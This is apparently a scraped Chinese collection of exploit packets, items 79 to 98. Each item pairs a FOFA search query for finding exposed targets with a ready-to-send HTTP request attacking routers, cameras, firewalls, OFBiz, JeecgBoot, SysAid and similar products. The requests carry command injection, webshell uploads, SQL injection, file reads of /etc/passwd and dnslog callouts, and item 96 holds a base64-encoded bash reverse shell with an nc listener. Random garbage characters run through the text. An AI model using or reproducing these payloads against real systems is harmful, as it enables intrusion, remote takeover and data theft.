7 x" a- x; y1 ]$ a$ o" s: U+ g6 iHost: x.x.x.x2 f$ A/ ]; k* c& e% w* {
0 `6 O8 Q2 N) B+ z* W8 b! h! |% e/ N
2 i6 U4 V8 x# ]; p79. BYTEVALUE 百为流控路由器远程命令执行
. E H0 g$ q) P+ {7 u: jFOFA:BYTEVALUE 智能流控路由器6 o; w O1 v8 M& f" c+ ]0 m3 K
GET /goform/webRead/open/?path=|id HTTP/1.1
2 W, A' F" T; b4 T; wHost:IP+ g4 Y5 E9 t! I
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0& i3 p; h) |/ h" y, R3 b- y4 e/ X
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.87 y6 |" Z u. ]% F e
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.20 K5 X2 q5 q% T* K
Accept-Encoding: gzip, deflate
4 p; j4 h9 T( ~3 q5 ]5 TConnection: close P- B/ L* x/ \
Upgrade-Insecure-Requests: 1
5 N# S9 G6 ~: x! l/ L! r4 ?; e7 M7 t
5 N; C1 C V1 ~6 m6 A- g7 W80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传" [( K4 F( R' F* c% k8 v
FOFA:app="速达软件-公司产品"
+ i8 B. t8 E+ b$ i% F: j! uPOST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
) s6 D( p" b+ r8 D4 THost: x.x.x.x
" Z/ J. f6 j7 T& ]+ kUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15& U+ X4 \$ C. _# \8 \! \
Content-Length: 27* a+ M2 i( A! ]" p
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8$ p/ r L9 X: B5 O8 Z T
Accept-Encoding: gzip, deflate% ~ m8 e$ m0 F3 Y h0 X
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
4 Q/ B# Q# U M0 W LConnection: close
8 u4 C* N5 r8 nContent-Type: application/octet-stream; s$ S- I4 e9 W/ e0 d
Upgrade-Insecure-Requests: 1" N! t: _6 R* `* E" \1 A$ S# A
8 Y3 ?2 l; I3 N<% out.print("oessqeonylzaf");%>( }. K( ~3 G. I" {
# C7 U( |1 `1 I7 z6 E6 v
) E, G$ o* m8 z0 Y0 y$ p7 F# w$ MGET /xykqmfxpoas.jsp HTTP/1.1
! e+ J+ y0 V" Y! I9 E) H% YHost: x.x.x.x
0 m- q" j" j$ z: A" k. K' G0 [6 ], J0 MUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15; d/ h) y- H" T6 h3 V2 l
Connection: close
/ T8 M9 V8 _& U' LAccept-Encoding: gzip' G- c/ h6 i' `
" r. g% R0 _3 o' e6 X
- _0 {$ e. ^7 }4 D4 {* B. I: @
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
) k+ \! a, X/ TFOFA:app="uniview-视频监控"
% y5 h& o6 U y& f8 uGET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
" E3 a; C- G, ~% {" C+ w; SHost: x.x.x.x8 l( J& c; t* \ q
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.158 n6 J, f9 ]2 b7 C# |2 J: c
Connection: close
6 F& H( K7 z+ T# JAccept-Encoding: gzip
3 p g/ \8 q8 a# p p0 }/ g4 y0 T" H# S! l* t6 L
8 m/ ]0 Y6 I) R# N7 {82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
: m' U" u! m! E1 F rFOFA:app="思福迪-LOGBASE"
/ z4 I$ R: a; U1 hPOST /bhost/test_qrcode_b HTTP/1.1" ~8 {( W- d/ M
Host: BaseURL
: `; o0 H% ~- |# @User-Agent: Go-http-client/1.1
* {9 g- H! B% c4 r- [/ p gContent-Length: 23- U3 r. s, Z6 A$ ?7 F( l N
Accept-Encoding: gzip' K# T# e6 { o! g
Connection: close
! Y, g5 ~. j" qContent-Type: application/x-www-form-urlencoded
: s* U+ ~7 W Z* wReferer: BaseURL
% E/ E; l c. \" O+ V8 E6 f
' E4 M3 c1 U% _: p4 W1 A7 dz1=1&z2="|id;"&z3=bhost
# s# l+ B5 `( T% C' Q+ O
, N: u" h4 [* e" I; q* j8 n
$ F* c/ m' I. x W- Q' Y83. JeecgBoot testConnection 远程命令执行/ ^/ U+ ?& ]8 z! ^
FOFA:title=="JeecgBoot 企业级低代码平台". y4 P. o: m: Y& f7 X- V
7 r" V: X; S8 P) h1 j
/ A% g0 M8 T/ K% i g5 lPOST /jmreport/testConnection HTTP/1.1% ?( V3 g2 F$ N) J g& I
Host: x.x.x.x
8 p; @, z7 e9 hUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
, t2 D i+ f% Q+ ~7 x- P' f/ Y6 _6 RConnection: close1 m4 h& j% t& m b% J
Content-Length: 8881
5 z: Z2 F6 \0 p' d, f8 U1 F; ~Accept-Encoding: gzip
' y9 K1 w. [& B+ S& wCmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"6 ?) Y& K3 w$ w; {3 \8 l3 r
Content-Type: application/json% m1 B. W( x, }) a
3 O6 O& K+ ^& y, _
PAYLOAD h6 d9 {% U/ E3 u$ m6 O
2 |& X8 W8 {) v8 ^84. Jeecg-Boot JimuReport queryFieldBySql 模板注入* l0 q" t" }+ G
FOFA:title=="JeecgBoot 企业级低代码平台"2 X) l, f7 l3 y/ B0 T' T, h/ j
3 x9 i$ ? X# \
9 a$ T! n1 t" a$ X6 k: i" o2 I+ m: E- V/ @; F+ r! N; m
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.10 M9 x) e4 U& y
Host: 192.168.40.130:8080
- c( x6 q4 d# O7 ]! v2 K# s+ p3 M; nUser-Agent: curl/7.88.1, z4 V k E* q+ D& C, r4 X4 H
Content-Length: 156
+ a8 l7 ?/ g3 E0 R" c: vAccept: */*
1 N( R( T! y% V1 I4 UConnection: close8 p3 z1 z; I; H) g8 w! a8 P
Content-Type: application/json
: q( M7 i- J5 w( E3 l- H$ [# s4 X OAccept-Encoding: gzip. o1 k$ f5 f0 _- ]6 B, j0 @+ c
, p3 T; z9 {+ r6 {3 k
{
. e. x' y8 H- | "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",& v; t5 i* M( V! m
"type": "0". }, _( `& i2 y! Z. k% h; g
}
3 R' S6 @( ~( _0 ?9 j2 M6 c% z! ~" X4 s9 S% e, [: Y% \
' V) l8 Y- U+ j
85. SysAid On-premise< 23.3.36远程代码执行6 W) `) S1 `3 l4 { m% l! D7 ?
CVE-2023-47246 q( O Y: ^8 z3 p' Y9 @/ g! D
FOFA:body="sysaid-logo-dark-green.png" + X& x4 m) l+ T$ _6 `% B) n+ t5 M% i$ d
EXP数据包如下,注入哥斯拉马7 K f$ ]( a' e' x3 ~! y3 E' f" @2 q
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.12 t% O* h6 V" h1 A- q2 ^, d
Host: x.x.x.x2 u) v5 ?" L- G9 l* [( t
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.154 h1 z0 P0 O6 E2 \
Content-Type: application/octet-stream& Z# D! b4 s; |5 v4 u
Accept-Encoding: gzip
, V4 U- p L. X4 Z9 e+ {0 N2 g7 @8 y) g- {' m }) A4 S. p0 d
PAYLOAD
4 D5 @( {& |- j3 K' p C4 s4 ]3 }
" k- K" P% L8 j0 R2 i- t回显URL:http://x.x.x.x/userfiles/index.jsp
6 z7 h* J5 p: t, p" Z; @. j: S4 D8 t$ O$ [' f i. ?
86. 日本tosei自助洗衣机RCE% d) h/ N: A# S% A
FOFA:body="tosei_login_check.php"
' {% ? t) X9 a4 J* x* f; O% NPOST /cgi-bin/network_test.php HTTP/1.1, c' z6 v; P/ j2 b: D' G6 M
Host: x.x.x.x3 C1 X! q4 i R
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
8 }" H& N1 t, g6 b d# DConnection: close
# J2 Z2 ?3 \- |! B6 G- ?) ]( dContent-Length: 44
) _" S( T% P4 _Accept: */*( J+ B3 U, e+ y- _
Accept-Encoding: gzip
9 I0 k$ T$ o) I% B* F/ j/ UAccept-Language: en0 ^8 q2 k) J: R" M
Content-Type: application/x-www-form-urlencoded0 _% q, P% t9 P6 Y& p$ n
3 [/ e1 ]+ e2 Q) k" U6 h mhost=%0acat${IFS}/etc/passwd%0a&command=ping# _4 }* a) R0 G9 C$ p
4 ?- I$ V k+ D1 \" e3 ^! m
* S6 p6 S$ R! B87. 安恒明御安全网关aaa_local_web_preview文件上传
; p( l; P* }* G/ G1 M9 U* y7 oFOFA:title="明御安全网关"' K8 B3 s) V+ W$ ?! {% K- E @
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
) h: ^( P( F6 U S0 |- r2 ZHost: X.X.X.X
; V5 @$ z) P5 e+ XUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
3 @9 [2 @5 x- r+ b l$ J) `/ cConnection: close
" M' B" T! d. g( R; h% }Content-Length: 198
x, j, m K \9 s. L, AAccept-Encoding: gzip& r: w) A9 f8 w
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd9 i: H: _% j2 q1 h$ L5 _
! j4 u2 c) H3 M3 s--qqobiandqgawlxodfiisporjwravxtvd2 |. `" Q! G, c# V ^. B
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"9 n# W, w" g7 [$ x$ _3 X
Content-Type: text/plain( Y2 t: @% R* a9 C
) j( `8 m0 x) z- G! S: e& \) [ @2ZqGNnsjzzU2GBBPyd8AIA7QlDq! S& d! }- I# E) z$ \
--qqobiandqgawlxodfiisporjwravxtvd--
. G" ]- ?3 x# D& R/ T5 n
& V6 ]) D$ }7 \, [$ d
/ M$ g' {2 F. F( w) r/jfhatuwe.php$ o+ b! V" x- g8 j
$ {" z3 d8 c" r! Y5 t88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
& [1 U$ A- K* F$ MFOFA:title="明御安全网关"
' E& N* v8 ^$ Z/ u+ u, x8 C# bGET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.11 J7 O4 A$ x/ Z0 `4 d, | d! b
Host: x.x.x.xx.x.x.x2 z0 D% T6 ~# x: }0 a
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+ N* X, C/ f% a V: {8 J2 z/ wAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
3 g: a, T' F' |0 ]Accept-Encoding: gzip, deflate2 I/ Q% m7 ^* w3 Z
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
. J5 w( {" w+ A% wConnection: close6 y; \6 a" S1 H* @
9 E8 ?: a) P2 i0 \
0 ~8 s0 N P- ~* s0 O* U& b) U/astdfkhl.php1 U- `4 N+ Y8 D* g/ Q8 H6 k* \
$ K. z0 l' m: g/ @/ z2 m
89. 致远互联FE协作办公平台editflow_manager存在sql注入
! c* Z+ l# y/ f- d1 Z. o3 |% NFOFA:title="FE协作办公平台" || body="li_plugins_download"1 [1 ^1 ~8 g: o5 K% R( l, ]! b; `
POST /sysform/003/editflow_manager.js%70 HTTP/1.1# c/ f' L7 I" n
Host: x.x.x.x
* R; G5 z" E/ D1 J0 V5 \1 FUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15* S) n" Y) a% `) E( A. [2 P6 h# K) K
Connection: close: }, Z3 N3 E. }) m
Content-Length: 41
! ^- }% c) v5 \: {0 n* AContent-Type: application/x-www-form-urlencoded* s+ f1 S, S# w8 I
Accept-Encoding: gzip( ^) l$ v( _* Z
. i z$ P9 }9 |0 a/ W% D Roption=2&GUID=-1'+union+select+111*222--+% [4 ]6 q1 H2 z" U
7 F- g( ~* Q( b, P
1 n% `: f. J" a& T$ F0 s90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
7 g7 A' n' T: p1 S( N5 hFOFA:icon_hash="-1830859634"
: a8 K+ T, C( z1 _8 BPOST /php/ping.php HTTP/1.1
) {) l- a" B( c9 l2 J' X* dHost: x.x.x.x+ ?' i# t4 O9 j" H( z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.04 L8 | s9 y7 A0 C5 }; I
Content-Length: 51% \7 B0 n0 c X5 h U5 |
Accept: application/json, text/javascript, */*; q=0.011 l0 f# g" y3 Z% Y
Accept-Encoding: gzip, deflate
. u* V' W6 W( e! p0 CAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
; @6 U% U! [* q+ EConnection: close. Y$ x& {3 b8 r6 V' Z7 @* m- a' @
Content-Type: application/x-www-form-urlencoded# Y" D% k0 M2 {4 k& J! i
X-Requested-With: XMLHttpRequest
* t7 s/ M( s$ a( A0 ]! z w+ |! ?+ v. C8 z2 j% u. d9 Z( H
jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig8 ?) W$ C5 k) z, L
* X) ^% k$ z& E* I& L4 v4 w7 c( y, R8 X2 O! n' B
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取" y/ X8 T* a! i
FOFA:title="综合安防管理平台"* r$ I8 k: m) d/ T, Y6 p5 U0 d5 B: Y
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1% @+ |0 _3 G" _6 R, O
Host: your-ip
- N; ?0 k5 N U p& lUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36- r5 I$ S' D- m
Accept-Encoding: gzip, deflate; C! u$ k. J* X- C% d9 N' [: A
Accept: */*/ G e9 f0 S2 o0 Y$ `( X! r
Connection: keep-alive) H: o7 H9 D/ w3 P9 v1 {" r1 x
* j4 D, G% \) L, @# C
' Y+ b- [0 v& D) [0 f5 Q
* H( U8 s7 p2 X+ h6 U
92. 海康威视运行管理中心session命令执行
, r6 `) H, [4 F/ c: s7 \( dFastjson命令执行
& Y5 O9 I( h- s) nhunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"; p- O3 N- [1 K
POST /center/api/session HTTP/1.12 B h8 f- k$ L; f
Host:
/ o* i, ]( H, B- |" |! B4 |. I' CAccept: application/json, text/plain, */*
% O2 t; q {% i$ T! k6 l! oAccept-Encoding: gzip, deflate
/ c1 v, b1 q* OX-Requested-With: XMLHttpRequest
, @* T) e7 u9 {6 N, h iContent-Type: application/json;charset=UTF-8' A1 O1 h$ W" }' z* D
X-Language-Type: zh_CN+ X$ g& G5 F% N: b
Testcmd: echo test
8 i8 i+ b8 r1 l& u& ~/ }User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.368 ~# B8 t' `2 P! _. ^7 q, g! O
Accept-Language: zh-CN,zh;q=0.9
, |0 {+ [3 k% W# N, NContent-Length: 57782 _. x/ e a' O' x2 |/ r
9 E H) ~% S% ~- m+ vPAYLOAD
4 z; p& ]; G( h) |, I9 B: x, D
& [- U) R! _1 ~
0 t, A9 x- l' V" g; ?, Z93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传0 f5 x0 r Y$ z$ w
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
J( D& ^6 f, [: h& N, A+ \$ _POST /?g=app_av_import_save HTTP/1.1+ W& w# T7 Z# J& y% `
Host: x.x.x.x
* H& b+ ?( r+ R& G9 x0 K7 }Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx# Z' h6 f- T$ [, M) Z& }+ Y+ a
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
' j- ?* S! S5 K9 a! U3 C) y7 `& R/ t. [9 D
------WebKitFormBoundarykcbkgdfx* g8 f/ }& W1 q- A; j
Content-Disposition: form-data; name="MAX_FILE_SIZE"
9 R" L+ [7 C* d H
" j9 F) O2 Q1 p* t: A2 ?- G1 s% w10000000
# g9 V1 p1 Q: p/ i+ T) r------WebKitFormBoundarykcbkgdfx
( T+ C5 S3 C# aContent-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
# q+ u5 F& O$ A1 I; |" JContent-Type: text/plain7 N( F% T, V! l; A8 a( _+ s9 @5 x2 h
* S- b& k' |- L- W( R& Bwagletqrkwrddkthtulxsqrphulnknxa, W$ ~" D( C- C8 e [% \) n
------WebKitFormBoundarykcbkgdfx6 J7 p& E0 ?; M ]8 m
Content-Disposition: form-data; name="submit_post"6 g$ K7 @) d: U7 y0 w1 N% J
0 x* d: }# a ~( M P3 j* p/ B
obj_app_upfile5 P I# Y' y, D( c; D; k
------WebKitFormBoundarykcbkgdfx" y9 `& D! H: l
Content-Disposition: form-data; name="__hash__"
, c, q$ i9 s+ W7 w3 Q& Y3 b5 W4 A# w8 Q$ X
0b9d6b1ab7479ab69d9f71b05e0e94452 M6 m3 @5 x5 L- y, r2 x$ G6 |
------WebKitFormBoundarykcbkgdfx--: K7 Z3 \( k7 G/ h- _0 M
: a | u1 R. n4 s, }$ ]2 t& F2 r) j
3 I% q0 Q- [4 V; r
GET /attachements/xlskxknxa.txt HTTP/1.1
( F& ?: ~; L% LHost: xx.xx.xx.xx
+ ?1 [3 u2 t. m7 N. L; L% s! {User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36/ w; s6 \: ~" K! P, B
7 k8 T) p& I2 a+ _( ^& T1 \* J
% k% s' L ^! q94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
' L# b/ T9 L O$ t3 e: TFOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
( F$ v+ ^) m6 J8 z6 ?( o# q, _POST /?g=obj_area_import_save HTTP/1.1$ C }# v* L& V
Host: x.x.x.x5 U9 |& D/ L0 x& b x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt; ]. H4 a" v: E; x6 b) l
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
( G9 U3 C8 ?7 N
- _5 D$ r+ p, |$ t% ?- c0 K------WebKitFormBoundarybqvzqvmt0 U I- u! T* X
Content-Disposition: form-data; name="MAX_FILE_SIZE": W1 D5 |1 f7 k$ e# W! r( R
( ]* |, |1 D1 M. _2 ?
100000005 O* U0 S( B9 S b# l! V$ H
------WebKitFormBoundarybqvzqvmt+ }. w& @" o0 n& F
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"1 Z7 K: t6 }1 v" b% f4 _
Content-Type: text/plain( W# Y N9 {5 J7 U
& J; G; t0 Y: c! \4 M/ mpxplitttsrjnyoafavcajwkvhxindhmu
& U* y2 M# s, f2 \* Q------WebKitFormBoundarybqvzqvmt
5 H1 c! }3 v: D5 T' \' RContent-Disposition: form-data; name="submit_post"" ]$ u7 P2 w; L& u6 n% A4 n
]7 f8 ]+ j+ Q+ @obj_app_upfile
5 T6 } \7 Q/ q------WebKitFormBoundarybqvzqvmt
7 f6 S" B9 \, { g9 t9 i6 XContent-Disposition: form-data; name="__hash__"
* t, c& U9 V& Y- |" k7 d6 }
. b) Y$ h% L+ Y8 J8 o6 g3 |0b9d6b1ab7479ab69d9f71b05e0e9445
6 N' {: | n: ]# e------WebKitFormBoundarybqvzqvmt--
: v5 L$ G6 B! S f) y4 R
6 C( F4 x- a$ W5 [- G" I3 x
8 w' N8 B* c ^2 r, {) C
- @ }- ]! T6 q0 ^/ ]GET /attachements/xlskxknxa.txt HTTP/1.1
4 P8 s4 U H+ |" F" K2 b" D( jHost: xx.xx.xx.xx
# t/ F' E+ ?" fUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.368 _' S5 P) r9 Q% b- C4 ^6 I6 ` }
Y+ ?* L; Z6 u4 e$ ^# {5 e
2 C B6 o3 D+ e+ ~+ O
4 Z+ P' }/ o, l* g) s# s" B95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行2 \% H* f3 L" M. u' U
CVE-2023-49070
* M" x0 a, y/ d; O0 f, WFOFA:app="Apache_OFBiz"* E) U& W$ m8 v' n. i% {# Z8 O) b
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.13 {; H( g$ s/ K, h0 n" I) N
Host: x.x.x.x
" y7 R2 c) W, mUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.367 M: \) E! }- A
Connection: close
0 r2 b& p$ Z2 w! b6 ~, T" o* dContent-Length: 889$ N% o3 b" {: p8 N( R$ Q
Content-Type: application/xml8 e& f& j3 ?; u/ `
Accept-Encoding: gzip
; o$ N6 X2 a9 T8 r7 q6 \0 l/ Y) H5 ]( y; t2 d
<?xml version="1.0"?># V: H# S7 P7 y% M2 M! \
<methodCall>
: j# m E* c) q6 g+ V S9 q r <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
' K6 p/ [ D6 T <params>% U2 T" ?- @) ^) A% ]; z1 u
<param>! U& H& x9 ^8 B+ s9 k+ Q
<value>. U# G# N; T4 ?9 i+ d. p. f
<struct>5 W3 P' ~# r& L i; M( `9 F# x
<member>( P Y% q) V/ ?2 \% z
<name>test</name>1 Y2 m4 ^7 N6 I. A" d
<value>2 h( ?% C7 K0 a7 j0 L
<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>& r: @9 N- w6 ]& v6 h# H
</value>, v4 m- N! T9 b7 P0 d& R! T1 A
</member>( P+ d7 E# H! P1 A7 p& b' Q3 B, B. V
</struct>' K* g% @% z5 l; m- z; x
</value>
- v. L* a/ Q! ~3 I k; h. m </param>
; Y9 u; |4 ?9 Q& |3 M </params>' l) U( Y- ~6 Z# p
</methodCall>
* I* G, M/ p% Z5 ?6 @5 I4 H |+ s8 m7 w7 W2 K: i
5 W$ b' j( A, B, ]* U9 @, c
用ysoserial生成payload* y6 h: P& G- D& I. M# K1 J, Z
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"
1 o$ S! w' A( d# M$ Q3 k; R+ U
+ H7 f7 m* L0 S6 f
" L0 G1 _2 \7 y% }将生成的payload替换到上面的POC
@$ t. ~) F# |; n J6 I* XPOST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
5 V% c# `; N5 a; CHost: 192.168.40.130:84431 W9 f$ h9 `+ \ m, }, V
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
. D; q! `$ w/ ZConnection: close7 Q6 C1 l( p. o8 m- n* B. w
Content-Length: 889
1 K6 l8 ^1 n# b; d" }! r5 ]Content-Type: application/xml1 z* A$ B: {. n' l+ M1 @- \
Accept-Encoding: gzip
2 l9 F. \ d# K$ G1 e/ r: O J4 U# M( O( D6 n, W1 A* C' W0 V6 H l
PAYLOAD
- ^+ p$ U: r& N: |5 m! e3 |
, n8 ]. c8 A+ O1 t k1 d. w96. Apache OFBiz 18.12.11 groovy 远程代码执行
, S' Z; L6 K* ]6 m+ `' Y& nFOFA:app="Apache_OFBiz"9 b! M! J) e3 ~) F N* n: U2 k7 K
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
, ~$ v3 m0 g' q. {5 \; x- G- GHost: localhost:8443
: G# [/ q) Y% g& C( QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
+ D; f( h5 E- i$ lAccept: */*: V% L j9 _8 a% T5 |. u$ A3 t7 F6 D
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.21 o( @% @0 y4 w$ H% x& D
Content-Type: application/x-www-form-urlencoded' Y& J! W: ]3 o
Content-Length: 55
5 @# F. t$ t' h+ w: G- H+ X# L$ u+ ^; k [! y( d1 X; F
groovyProgram=throw+new+Exception('id'.execute().text);, e) {+ _$ E6 v- k9 Q
* h& `# B6 x$ ^ A! |. @0 ]' [; n7 X @3 _; B+ ]
反弹shell- x, }4 A1 }. B
在kali上启动一个监听# ?, ~ e' z& h/ m9 a+ n' F
nc -lvp 7777
+ B* b3 U, _' n" y/ ]4 r# n" G- l3 ] j) C( k
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1. b" y: x1 F0 u
Host: 192.168.40.130:8443
0 r6 G& X! ~/ \6 \, |User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0# t' t% v# u. k( J3 Y2 I
Accept: */*
' B, D0 h8 v2 N7 QAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.29 a" ]3 Y& E5 b' x8 Z6 ]
Content-Type: application/x-www-form-urlencoded
8 \1 A: O: {4 q: aContent-Length: 711 F: I8 e" }$ t
+ o/ f: D8 @7 Y. J+ F0 s
groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();
, f4 L5 n$ }: U0 o1 @5 t6 c1 R ~8 X- N
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
" g w' N) P5 [4 m9 F1 O# T1 ~FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
7 G. O" A- p6 E/ Q' c6 u, \' D! tGET /passport/login/ HTTP/1.1
P0 B& V4 K+ pHost: 192.168.40.130:80850 K6 N1 h0 |9 I) C2 F
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 l" r& g3 D* {% b* W4 @
Accept-Encoding: gzip9 a4 T& |/ i* q% D2 P9 o+ K- {
Connection: close
. D0 N( @. g: F1 e) zCookie: rememberMe=PAYLOAD
9 } p1 x0 P; d2 O3 y* {' o/ IX-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"& p- D5 g8 \7 w0 H3 H5 U
. w: y( T' q0 K8 Q* ~3 M, ^) ^4 _" B) l3 Y1 J2 M+ }
98. SpiderFlow爬虫平台远程命令执行# ?- R5 e$ w+ _
CVE-2024-0195$ F0 T1 v; w! K
FOFA:app="SpiderFlow"1 b2 e- B: \+ r2 m* ^
POST /function/save HTTP/1.1) W" b3 f& d' Z/ B1 g
Host: 192.168.40.130:8088
9 j' F5 r5 Y: H0 I, tUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
9 N: P" Q! g; _0 k! Q$ K. V* _1 X2 tConnection: close* {1 w8 b! y, A5 t |
Content-Length: 1217 \2 X. l, B# L+ v' E, z# E* v
Accept: */*
) u9 b9 E8 M& ^7 ]Accept-Encoding: gzip, deflate4 u. v( d5 j: v/ d. t
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
, V$ ^( F% e7 `+ M. h: F7 vContent-Type: application/x-www-form-urlencoded; charset=UTF-82 c6 `3 |: c1 Q4 N; U! `, ~
X-Requested-With: XMLHttpRequest
; H# R# }% c3 M
* i; W. |/ G- H9 ?4 Rid=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B5 h( A: P# j: b( T
